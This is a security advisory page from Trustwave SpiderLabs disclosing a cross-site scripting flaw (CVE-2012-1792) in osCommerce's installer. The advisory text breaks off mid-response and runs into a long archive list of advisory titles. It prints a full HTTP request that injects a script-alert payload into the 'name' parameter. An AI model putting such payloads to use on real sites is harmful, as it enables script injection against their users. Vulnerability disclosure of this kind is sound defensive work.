Trustwave's SpiderLabs Security Advisory TWSL2012-005: Cross-Site Scripting Vulnerability in osCommerce Published: 03/23/12 Version: 1.0 Vendor: osCommerce (http://oscommerce.com/) Product: osCommerce Version affected: v3.0.2 and prior versions Product description: osCommerce is an e-commerce solution that is available for free as an Open Source based solution released under the GNU General Public License. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: Cross-Site Scripting Vulnerabilities in "name" parameter in 'index.php' page CVE: CVE-2012-1792 After extracting the osCommerce source files on to a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the root 'index.php' page. Example: Performing XSS on "name" parameter #Request POST /oscommerce/index.php?RPC&Setup&Install&DBCheck HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://A.B.C.D/oscommerce/index.php?Install Content-Length: 97 Cookie: Setup[language]=en_US; 9d4bb4a09f511681369671a08beff228=tomvi1uuhul0m676ha8and9fn6 Pragma: no-cache Cache-Control: no-cache server=&username=&password=&name=%3Cscript%3Ealert(123)%3C%2Fscript%3E&port=&class=MySQL_Standard #Response HTTP/1.1 200 OK Date: Wed, 18 Jan 2012 20:56:07 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 138 Connection: close Content-Type: text/html; charset=utf-8 {"result":false,"error_message":"SQLSTATE[42000] [1044] Access denied for user ''@'localhost' to database ' Security Advisories | Trustwave

Security Advisories

Spending each day immersed in penetration tests and research into the latest threats, our SpiderLabs© experts occasionally discover new vulnerabilities as a part of their work.

Latest Advisory


  • Threat Advisory Icon

    TWSL2018-005

    Vulnerability in WD My Cloud personal cloud storage

    Oct 29, 2018 - Reliable, centralized personal storage with automatic backup that plugs into your own home network. Share whatever you want, anywhere you have an Internet connection.

    Read | Download

Advisory Archive


Advisory Title Date
TWSL2018-011 Use after free vulnerability in QFX Software KeyScrambler Oct 02, 2018 Read | Download
TWSL2018-010 Credential Leak Flaws in Windows PureVPN Client Sep 27, 2018 Read | Download
TWSL2018-009 CVE-2018-16962: Webroot SecureAnywhere macOS Kernel Level Memory Corruption Sep 13, 2018 Read | Download
TWSL2018-008 CVE-2018-8006 - Cross-Site Scripting (XSS) Vulnerability in Apache ActiveMQ Aug 24, 2018 Read | Download
TWSL2018-007 CVE-2018-2892 - Kernel Level Privilege Escalation in Oracle Solaris Jul 24, 2018 Read | Download
TWSL2018-006 Unpatched Remote Code Execution in Reprise License Manager Jul 18, 2018 Read | Download
TWSL2018-004 Vulnerabilities in NETGEAR Nighthawk X4S router (R7800) Feb 07, 2018 Read | Download
TWSL2018-002 Vulnerabilities in NETGEAR R8500 router firmware Feb 07, 2018 Read | Download
TWSL2018-003 Vulnerabilities in NETGEAR R8500 router firmware Feb 07, 2018 Read | Download
TWSL2018-001 Multiple Vulnerabilities in WD My Cloud personal cloud storage Feb 01, 2018 Read | Download
TWSL2017-017 Remote Unauthenticated DoS in Debut embedded httpd server used by Brother printers. Nov 17, 2017 Read | Download
TWSL2017-016 Local kernel heap buffer overflow Vulnerability in ESET DESLock+ client application Aug 15, 2017 Read | Download
TWSL2017-015 Multiple Vulnerabilities in ManageEngine Applications Manager Aug 09, 2017 Read | Download
TWSL2017-014 Multiple Vulnerabilities in ManageEngine OpManager Jul 26, 2017 Read | Download
TWSL2017-013 Multiple Authentication Bypass Vulnerabilities in ManageEngine Applications Manager Jul 26, 2017 Read | Download
TWSL2017-012 Remote un-authenticated DoS in IPsec-Tools Racoon Jul 09, 2017 Read | Download
TWSL2017-011 Lockscreen Lockout Bypass in Elephone P9000 Android Smartphone Jun 28, 2017 Read | Download
TWSL2017-010 Multiple Vulnerabilities in Humax Routers Jun 28, 2017 Read | Download
TWSL2017-009 Multiple Vulnerabilities in Avast Antivirus Mar 31, 2017 Read | Download
TWSL2017-008 Unauthenticated Privilege Escalation Vulnerability in Serv-U FTP/MFT Server Mar 22, 2017 Read | Download
TWSL2017-007 Undocumented Backdoor Account in DBLTek GoIP Mar 02, 2017 Read | Download
TWSL2017-006 Multiple Vulnerabilities in Polystar Jupiter Feb 22, 2017 Read | Download
TWSL2017-005 Improper Input Validation Vulnerability in SAP Adaptive Server Enterprise Feb 13, 2017 Read | Download
TWSL2017-004 Unauthenticated Backdoor Access in Unanet Feb 08, 2017 Read | Download
TWSL2017-003 Multiple Vulnerabilities in NETGEAR Routers Jan 30, 2017 Read | Download
TWSL2017-002 Multiple Vulnerabilities in McAfee Security Scan Plus Jan 23, 2017 Read | Download
TWSL2017-001 Multiple Vulnerabilities in Digitech Systems PaperVision Enterprise Jan 11, 2017 Read | Download
TWSL2016-021 Plugin authentication by-pass Vulnerability in Microsoft Skype for Mac OS-X Dec 13, 2016 Read | Download
TWSL2016-020 Buffer Overflow Vulnerability in B Labs Bopup Communication Server Nov 03, 2016 Read | Download
TWSL2016-019 Multiple XSS Vulnerabilities in Zeuscart Sep 21, 2016 Read | Download
TWSL2016-018 Multiple Persistent XSS Vulnerabilities in D-Link DSL-2740E ADSL Router Sep 16, 2016 Read | Download
TWSL2016-017 SQL Injection Vulnerability in SAP Adaptive Server Enterprise Sep 16, 2016 Read | Download
TWSL2016-016 Multiple Vulnerabilities in Opsview Monitor Pro Sep 01, 2016 Read | Download
TWSL2016-015 Password Disclosure Vulnerability in Cisco Connected Streaming Analytics Aug 11, 2016 Read | Download
TWSL2016-014 Vulnerabilities in ComfortLink™ II XL850 Aug 11, 2016 Read | Download
TWSL2016-013 Unrestricted File Creation vulnerability in SAP Adaptive Server Enterprise Aug 02, 2016 Read | Download
TWSL2016-012 Multiple Vulnerabilities in Lenovo Solution Center Jun 23, 2016 Read | Download
TWSL2016-011 Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1 Jun 08, 2016 Read | Download
TWSL2016-010 Information Disclosure vulnerability in SAP ASE Installer May 26, 2016 Read | Download
TWSL2016-009 Privilege Escalation Vulnerability in Lenovo Solution Center May 11, 2016 Read | Download
TWSL2016-008 SQL injection vulnerability in SAP ASE May 09, 2016 Read | Download
TWSL2016-007 Multiple Vulnerabilities in Cacti Apr 20, 2016 Read | Download
TWSL2016-006 Multiple Vulnerabilities in Zen Cart Mar 25, 2016 Read | Download
TWSL2016-005 Vulnerabilities in DevArt dotConnect for Oracle Mar 10, 2016 Read | Download
TWSL2016-003 Unsafe unlinking of files in Sophos Antivirus Mar 09, 2016 Read | Download
TWSL2016-004 Multiple Vulnerabilities in Magnolia CMS Mar 09, 2016 Read | Download
TWSL2016-002 Multiple Vulnerabilities in iNovah Feb 18, 2016 Read | Download
TWSL2016-001 Multiple Vulnerabilities in Cisco Meraki Jan 13, 2016 Read | Download
TWSL2015-024 Multiple Vulnerabilities in Proxmox Mail Gateway Dec 30, 2015 Read | Download
TWSL2015-023 Missing authorization check in SAP Adaptive Server Enterprise Dec 09, 2015 Read | Download
TWSL2015-022 Cross-Site Scripting in VMware Virtual Center Appliance (vCSA) Web Application Console Nov 17, 2015 Read | Download
TWSL2015-021 Joomla SQL Injection Vulnerability Oct 22, 2015 Read | Download
TWSL2015-020 Unauthenticated Local File Inclusion Vulnerability in Oracle Open Commerce Platform 3.4 Oct 20, 2015 Read | Download
TWSL2015-019 Privilege escalation vulnerability in Oracle Database Oct 20, 2015 Read | Download
TWSL2015-018 Service Privilege Elevation in Lenovo System Update 5 Oct 15, 2015 Read | Download
TWSL2015-017 Reflected File Download in Red Hat Feedhenry Oct 09, 2015 Read | Download
TWSL2015-016 Path Traversal in Oracle GlassFish Server Open Source Edition Aug 27, 2015 Read | Download
TWSL2015-015 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Jul 17, 2015 Read | Download
TWSL2015-014 Account Probing Vulnerability in Oracle Database Jul 15, 2015 Read | Download
TWSL2015-013 Buffer Overflow Vulnerability in Oracle MySQL Jul 15, 2015 Read | Download
TWSL2015-012 XSS in Oracle Java Server Faces Jul 15, 2015 Read | Download
TWSL2015-011 Vulnerability in the pam_unix module in Linux-PAM Jun 26, 2015 Read | Download
TWSL2015-010 Reflected Cross-site Scripting Vulnerabilities in codeBeamer Jun 09, 2015 Read | Download
TWSL2015-009 Request Hijacking Bypass Vulnerability In RubyGems Jun 08, 2015 Read | Download
TWSL2015-008 Multiple Vulnerabilities in SAP Adaptive Server Enterprise May 22, 2015 Read | Download
TWSL2015-007 Request Hijacking Vulnerability In RubyGems May 18, 2015 Read | Download
TWSL2015-006 Multiple Vulnerabilities in QlikView May 13, 2015 Read | Download
TWSL2015-005 Blind SQL injection in XpanceNET Apr 24, 2015 Read | Download
TWSL2015-004 "Probe" login access vulnerability in SAP ASE Apr 23, 2015 Read | Download
TWSL2015-003 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Mar 19, 2015 Read | Download
TWSL2015-002 Cross-Site Scripting in Magnolia CMS Feb 12, 2015 Read | Download
TWSL2015-001 Multiple Vulnerabilities in IceWarp Mail Server Feb 12, 2015 Read | Download
TWSL2014-016 Reflected Cross-Site Scripting Vulnerability in VMware Virtual Center Appliance (vCSA) Web Application Console Dec 05, 2014 Read | Download
TWSL2014-015 Cross Site Scripting Vulnerability in Gizmox WebGui Oct 29, 2014 Read | Download
TWSL2014-014 Multiple Vulnerabilities in Gerber WebPDM Product Data Management System Oct 24, 2014 Read | Download
TWSL2014-013 Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptive Server Enterprise Sep 12, 2014 Read | Download
TWSL2014-011 Secure Desktop Protection Bypass in Keepass Aug 05, 2014 Read | Download
TWSL2014-012 Secure Desktop Protection Bypass in 1Password for Windows Aug 05, 2014 Read | Download
TWSL2014-010 Multiple Vulnerabilities in Wing FTP Server Jul 02, 2014 Read | Download
TWSL2014-009 Multiple Vulnerabilities in BSS Company Software Jul 01, 2014 Read | Download
TWSL2014-008 Cross Site Scripting Vulnerability in Cisco ASA May 28, 2014 Read | Download
TWSL2014-007 Multiple Vulnerabilities in Y-Cam May 01, 2014 Read | Download
TWSL2014-006 NetSupport Manager Information Disclosure Vulnerability Apr 17, 2014 Read | Download
TWSL2014-005 VPN Privilege Escalation Vulnerability in Cisco ASA Apr 09, 2014 Read | Download
TWSL2014-004 Information Disclosure in the BC Collected Information Export Extension for eZ Publish CMS Mar 20, 2014 Read | Download
TWSL2014-003 Blind SQL Injection Vulnerability in Tableau Server Jan 24, 2014 Read | Download
TWSL2014-002 Buffer Overflow Vulnerability in DaumGame ActiveX Jan 06, 2014 Read | Download
TWSL2014-001 Multiple Vulnerabilities in Franklin Fueling's TS-550 evo Jan 03, 2014 Read | Download
TWSL2013-032 Path Traversal Vulnerability in FTPDrive Nov 20, 2013 Read | Download
TWSL2013-033 Multiple Vulnerabilities in Easy File Manager Nov 20, 2013 Read | Download
TWSL2013-034 Path Traversal Vulnerability in WiFi HD Free Nov 20, 2013 Read | Download
TWSL2013-031 Information Disclosure Vulnerability in RiskNet Acquirer Nov 07, 2013 Read | Download
TWSL2013-030 Multiple Vulnerabilities in Quixplorer Nov 06, 2013 Read | Download
TWSL2013-029 Information Disclosure Vulnerability in QNAP Photo Station Sep 27, 2013 Read | Download
TWSL2013-028 Persistent Denial of Service Vulnerability in Vino VNC Server Sep 16, 2013 Read | Download
TWSL2013-027 Multiple Vulnerabilities in ajaXplorer Sep 05, 2013 Read | Download
TWSL2013-026 Multiple Web Application Vulnerabilities in RockMongo Aug 16, 2013 Read | Download
TWSL2013-024 Cross Site Scripting (XSS) vulnerability in McAfee Superscan 4.0 Aug 02, 2013 Read | Download
TWSL2013-025 Arbitrary File Upload Vulnerability in Official Nmap Aug 02, 2013 Read | Download
TWSL2013-020 Hard-Coded Bluetooth PIN Vulnerability in LIXIL Satis Toilet Aug 01, 2013 Read | Download
TWSL2013-021 Multiple Vulnerabilities in Karotz Smart Rabbit Aug 01, 2013 Read | Download
TWSL2013-022 No Authentication Vulnerability in Radio Thermostat Aug 01, 2013 Read | Download
TWSL2013-023 Lack of Web and API AuthenticationVulnerability in INSTEON Hub Aug 01, 2013 Read | Download
TWSL2013-018 Multiple Vulnerabilities in OpenEMR Jul 12, 2013 Read | Download
TWSL2013-007 Multiple Vulnerabilities in VLC Media Player - Web Interface. Jun 10, 2013 Read | Download
TWSL2013-006 Cross-Site Scripting Vulnerability in Coldbox. Jun 10, 2013 Read | Download
TWSL2013-008 Command Injection Vulnerabilities in Linksys Routers. May 31, 2013 Read | Download
TWSL2013-002 Multiple XSS Vulnerabilities in The Bug Genie. May 09, 2013 Read | Download
TWSL2013-004 Group Name Enumeration Vulnerability in Cisco IKE Implementation. Apr 18, 2013 Read | Download
TWSL2012-016 Multiple Vulnerabilities in Bitweaver Oct 23, 2012 Read | Download
TWSL2012-019 Cross-Site Scripting Vulnerability in Support Incident Tracker Aug 29, 2012 Read | Download
TWSL2012-014 Multiple Vulnerabilities in Scrutinizer NetFlow and sFlow Analyzer Jul 27, 2012 Read | Download
TWSL2012-004 Multiple Vulnerabilities in Zen Cart May 03, 2012 Read | Download
TWSL2012-012 Cross-Site Scripting Vulnerability in Support Incident Tracker Apr 20, 2012 Read | Download
TWSL2012-008 Multiple Vulnerabilities in Scrutinizer NetFlow Apr 10, 2012 Read | Download
TWSL2012-005 Cross-Site Scripting Vulnerability in osCommerce Platform Mar 23, 2012 Read | Download
TWSL2012-003 Cross-Site Scripting Vulnerability in Movable Type Publishing Platform Feb 24, 2012 Read | Download
TWSL2012-002 Multiple Vulnerabilities in WordPress Jan 24, 2012 Read | Download
TWSL2012-001 Cross-Site Scripting Vulnerability in Textpattern Content Management System Jan 03, 2012 Read | Download
TWSL2011-019 Cross-Site Scripting Vulnerability in phpMyAdmin Dec 22, 2011 Read | Download
TWSL2011-018 Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface Dec 20, 2011 Read | Download
TWSL2011-017 Multiple Vulnerabilities in Merethis Centreon Nov 04, 2011 Read | Download
TWSL2011-014 Vulnerability in Pantech Web Browser SSL Implementation Sep 23, 2011 Read | Download
TWSL2011-013 Multiple Vulnerabilities in IceWarp Mail Server Sep 23, 2011 Read | Download
TWSL2011-008 Focus Stealing Vulnerability in Android Aug 06, 2011 Read | Download
TWSL2011-007 iOS SSL Implementation Does Not Validate Certificate Chain Jul 25, 2011 Read | Download
TWSL2011-006 IBM Web Application Firewall Bypass Jun 21, 2011 Read | Download
TWSL2011-005 Directory Traversal in Trustwave WebDefend Enterprise Jun 17, 2011 Read | Download
TWSL2011-004 Cross-Site Scripting Vulnerability in ZyXEL ZyWALL 70 Firewall Jun 10, 2011 Read | Download
TWSL2011-003 Vulnerabilities discovered in Avocent Cyclades ACS Web Manager Mar 11, 2011 Read | Download
TWSL2011-001 Vulnerabilities in Trustwave WebDefend Enterprise Feb 15, 2011 Read | Download
TWSL2011-002 Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) Feb 04, 2011 Read | Download
TWSL2010-008 Clear iSpot/Clearspot CSRF Vulnerabilities Dec 10, 2010 Read | Download
TWSL2010-007 Passlogix v-GO Self-Service Password Reset Bypass via Invalid SSL Certificate Dec 10, 2010 Read | Download
TWSL2010-006 Multiple Vulnerabilities in Camtron CMNC-200 IP Camera Nov 12, 2010 Read | Download
TWSL2010-005 FreePBX recordings interface allows remote code execution Sep 23, 2010 Read | Download
TWSL2010-003 Unauthorized access to root NFS export on EMC Celerra Network Attached Storage(NAS) appliance Jul 29, 2010 Read | Download
TWSL2010-002 Web Service Hijacking in VMWare WebAccess Mar 30, 2010 Read | Download
TWSL2010-001 View state tampering vulnerabilities in products from Microsoft, Apache, and Sun Microsystems Feb 03, 2010 Read | Download
TWSL2009-002 Cisco's Adaptive Security Appliance (ASA) Web VPN Multiple Vulnerabilities Jun 24, 2009 Read | Download
TWSL2009-001 Profense Web Application Firewall and Load Balancer multiple vulnerabilities May 19, 2009 Read | Download

Related SpiderLabs Blogs